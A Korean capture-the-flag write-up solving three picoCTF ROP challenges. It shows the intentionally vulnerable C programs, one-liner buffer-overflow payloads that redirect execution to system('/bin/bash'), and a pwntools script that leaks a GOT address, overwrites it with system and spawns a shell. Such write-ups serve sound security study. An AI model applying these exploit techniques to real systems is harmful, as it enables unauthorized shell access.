[Pico] ROP 1, 2, 3

ROP 1        <= 1번

ROP 2        <= 2번

ROP 3        <= 3번

4번도 풀고 싶은데 4번은 문제가 바뀌었다 어디어디서 뭐 할 수 있다인데 저딴 디렉토리도 없고 ssh 주소도 안줬으면서 ㅡㅡ

쨋든 해볼게여 겁나 쉬워요

ROP1

---

#undef _FORTIFY_SOURCE

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

int not_called() {

return system("/bin/bash");

}

void vulnerable_function() {

char buf[128];

read(STDIN_FILENO, buf, 256);

}

void be_nice_to_people() {

// /bin/sh is usually symlinked to bash, which usually drops privs. Make

// sure we don't drop privs if we exec bash, (ie if we call system()).

gid_t gid = getegid();

setresgid(gid, gid, gid);

}

int main(int argc, char** argv) {

        be_nice_to_people();

vulnerable_function();

write(STDOUT_FILENO, "Hello, World\n", 13);

}

대충 코드가 이런데 뭐 할게 있나요,,, 그냥 not_called 호출 시키면 끝

(python -c 'print "A"*140 + "\xa4\x84\x04\x08"';cat) | ./ROP1

ROP2

---

#undef _FORTIFY_SOURCE

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

char * not_used = "/bin/bash";

int not_called() {

return system("/bin/date");

}

void vulnerable_function() {

char buf[128];

read(STDIN_FILENO, buf, 256);

}

void be_nice_to_people() {

// /bin/sh is usually symlinked to bash, which usually drops privs. Make

// sure we don't drop privs if we exec bash, (ie if we call system()).

gid_t gid = getegid();

setresgid(gid, gid, gid);

}

int main(int argc, char** argv) {

        be_nice_to_people();

vulnerable_function();

write(STDOUT_FILENO, "Hello, World\n", 13);

}

이거도 아까랑 달라지기는 했는데 흠,,

system 함수 있고 /bin/bash 문자열도 제공해주니까 그냥 엮으면 되겠네요 

(python -c 'print "A"*140 + "\xa0\x83\x04\x08"+"ABCD"+"\x10\x86\x04\x08"';cat)|./ROP2

ROP3 

---

#undef _FORTIFY_SOURCE

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

void vulnerable_function()  {

char buf[128];

read(STDIN_FILENO, buf,256);

}

void be_nice_to_people() {

// /bin/sh is usually symlinked to bash, which usually drops privs. Make

// sure we don't drop privs if we exec bash, (ie if we call system()).

gid_t gid = getegid();

setresgid(gid, gid, gid);

}

int main(int argc, char** argv) {

        be_nice_to_people();

vulnerable_function();

write(STDOUT_FILENO, "Hello, World\n", 13);

}

?? 처음보면 고민하겠지만 rop공룡 문제를 푼 우리는 쉽게할수 있습니다

read 와 write 를 이용한 read_got overwrite 가 되겠네요 

---

from pwn import *

PPPR = 0x804855d

read_plt = 0x08048360

read_got = 0x0804a000

write_plt = 0x080483a0

bss = 0x0804a020

offset = 0x99a10

binsh = "/bin/sh"

len_binsh = len(binsh)

p = remote("localhost", 9906)

pay = "A"*140

pay += p32(read_plt)+p32(PPPR)+p32(0)+p32(bss)+p32(len_binsh)       #read(0, bss, 8)     => Overwrite /bin/sh to bss

pay += p32(write_plt)+p32(PPPR)+p32(1)+p32(read_got)+p32(4)    #write(1, read_got, 4)  => printf read_got

pay += p32(read_plt)+p32(PPPR)+p32(0)+p32(read_got)+p32(4)    #read(0, read_got, 4)   => Overwrite system to read_got

pay += p32(read_plt)+"ABCD"+p32(bss)    #read("ABCD", bss)  =>   system(bss)  =>  system("/bin/sh")

print "Send Explot : %s" % pay

p.send(pay)

print "Send /bin/sh : %s" % binsh

p.send(binsh)

sleep(1)

print "Reseving"

tm = p.recv(4)

print "Reseve Complete!"

print "read_got : %x" % u32(tm)

sys = u32(tm) - offset

print "system : %x" % sys

p.send(p32(sys))

sleep(0.3)

print "Send system"

     

p.sendline("id")

sleep(1)

print p.recvline()

p.interactive()

---

그냥 rop공룡 문제코드 가져와서 주소값만 바꿨,,,,

이렇게 끝나네요 4번 풀고싶은데